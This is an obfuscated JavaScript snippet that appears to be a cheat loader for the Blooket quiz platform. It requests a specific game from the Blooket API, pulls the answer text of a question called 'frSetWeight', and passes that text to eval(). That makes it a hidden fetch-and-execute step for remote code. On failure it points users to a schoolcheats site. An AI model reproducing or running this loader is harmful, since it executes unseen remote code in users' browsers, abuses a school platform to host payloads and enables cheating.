function _0x4c6a() {
    const _0x35c11c = [
        '\x20version?',
        '51e5',
        'tBoya',
        'hgcTa',
        'QrVyO',
        'https://ap',
        'open',
        'et/',
        '1318046jBgedr',
        '4a330b5570',
        'uhXOF',
        '6531WkcoWt',
        'com/api/ga',
        '8616lpEgwG',
        '.net/blook',
        '3853971bzSfLE',
        'question',
        'json',
        'frSetWeigh',
        'RIbIn',
        'iJvUq',
        '34143896HAkEJW',
        'questions',
        'answers',
        'then',
        'he\x20updated',
        'hoolcheats',
        'KpcWT',
        'status',
        '61ac5b3fe4',
        'https://sc',
        'outdated.\x20',
        'mes?gameId',
        '4373352iJTVUL',
        'i.blooket.',
        'WkFIL',
        'Script\x20is\x20',
        '1595569EMTJbh',
        't\x20to\x20get\x20t',
        'oAWfp',
        'Do\x20you\x20wan',
        '8689320NffEID',
        'filter'
    ];
    _0x4c6a = function () {
        return _0x35c11c;
    };
    return _0x4c6a();
}
function _0x11e7(_0x26ea63, _0x2e6750) {
    const _0x4d3873 = _0x4c6a();
    return _0x11e7 = function (_0x2d6cb8, _0x41f449) {
        _0x2d6cb8 = _0x2d6cb8 - (-0x305 * -0x8 + -0x1d09 + 0x6b1 * 0x1);
        let _0x4eb270 = _0x4d3873[_0x2d6cb8];
        return _0x4eb270;
    }, _0x11e7(_0x26ea63, _0x2e6750);
}
(function (_0x22dbfc, _0x121198) {
    const _0x2b072d = _0x11e7, _0x20285d = _0x22dbfc();
    while (!![]) {
        try {
            const _0x12698d = parseInt(_0x2b072d(0x1e4)) / (0x182d + 0x65 * 0x8 + 0x1 * -0x1b54) + parseInt(_0x2b072d(0x1f2)) / (0x73 * -0x3b + 0x270d * -0x1 + -0x10 * -0x419) + -parseInt(_0x2b072d(0x1f9)) / (-0xfed * -0x1 + 0x1d54 + -0x2d3e) + parseInt(_0x2b072d(0x1e0)) / (0x25 * 0x25 + -0xcc0 + 0x76b) + parseInt(_0x2b072d(0x1e8)) / (-0x1b51 + 0x1 * -0x265a + 0x41b0) + parseInt(_0x2b072d(0x1f7)) / (-0x13cc + 0x450 + 0x5 * 0x31a) * (parseInt(_0x2b072d(0x1f5)) / (-0x17 * -0x15 + 0x1 * -0x14e3 + 0x1 * 0x1307)) + -parseInt(_0x2b072d(0x1d4)) / (-0x9 * 0x15d + 0x535 + 0x718);
            if (_0x12698d === _0x121198)
                break;
            else
                _0x20285d['push'](_0x20285d['shift']());
        } catch (_0x4f518e) {
            _0x20285d['push'](_0x20285d['shift']());
        }
    }
}(_0x4c6a, -0x5 * -0x21e14 + 0x186d68 + 0x2 * -0xad8f1), ((() => {
    const _0x12b39b = _0x11e7, _0x40a4da = {
            'oAWfp': function (_0x5bd5a7, _0x1838f0) {
                return _0x5bd5a7 !== _0x1838f0;
            },
            'tBoya': function (_0xf65413, _0x13888c) {
                return _0xf65413(_0x13888c);
            },
            'iJvUq': _0x12b39b(0x1e3) + _0x12b39b(0x1de) + _0x12b39b(0x1e7) + _0x12b39b(0x1e5) + _0x12b39b(0x1d8) + _0x12b39b(0x1ea),
            'KpcWT': _0x12b39b(0x1dd) + _0x12b39b(0x1d9) + _0x12b39b(0x1f8) + _0x12b39b(0x1f1),
            'WkFIL': function (_0x2c2a6b, _0x40191e) {
                return _0x2c2a6b(_0x40191e);
            },
            'RIbIn': _0x12b39b(0x1dc) + _0x12b39b(0x1f3) + _0x12b39b(0x1eb),
            'uhXOF': _0x12b39b(0x1d1) + 't',
            'QrVyO': function (_0x53798b, _0x3a06d8) {
                return _0x53798b + _0x3a06d8;
            },
            'hgcTa': _0x12b39b(0x1ef) + _0x12b39b(0x1e1) + _0x12b39b(0x1f6) + _0x12b39b(0x1df) + '='
        };
    try {
        const _0x313114 = _0x40a4da[_0x12b39b(0x1d2)], _0x25a940 = _0x40a4da[_0x12b39b(0x1f4)];
        _0x40a4da[_0x12b39b(0x1e2)](fetch, _0x40a4da[_0x12b39b(0x1ee)](_0x40a4da[_0x12b39b(0x1ed)], _0x313114))[_0x12b39b(0x1d7)](_0x4bcb6b => {
            const _0x452393 = _0x12b39b;
            if (_0x40a4da[_0x452393(0x1e6)](_0x4bcb6b[_0x452393(0x1db)], 0x1561 + -0xce0 + -0x7b9)) {
                const _0x4cce82 = _0x40a4da[_0x452393(0x1ec)](confirm, _0x40a4da[_0x452393(0x1d3)]);
                _0x4cce82 && window[_0x452393(0x1f0)](_0x40a4da[_0x452393(0x1da)]);
                return;
            }
            return _0x4bcb6b[_0x452393(0x1d0)]();
        })[_0x12b39b(0x1d7)](_0x1e7169 => {
            const _0x5a1b8b = _0x12b39b;
            _0x40a4da[_0x5a1b8b(0x1e2)](eval, _0x1e7169[_0x5a1b8b(0x1d5)][_0x5a1b8b(0x1e9)](_0x69fb01 => _0x69fb01[_0x5a1b8b(0x1fa)] == _0x25a940)[-0x1f23 + -0x47 * 0x26 + 0x29ad][_0x5a1b8b(0x1d6)][-0x19fe * -0x1 + 0x1150 + 0x15a7 * -0x2]);
        });
    } catch (_0x4d0f18) {
        const _0x83436b = _0x40a4da[_0x12b39b(0x1e2)](confirm, _0x40a4da[_0x12b39b(0x1d3)]);
        if (_0x83436b)
            return window[_0x12b39b(0x1f0)](_0x40a4da[_0x12b39b(0x1da)]);
    }
})()));
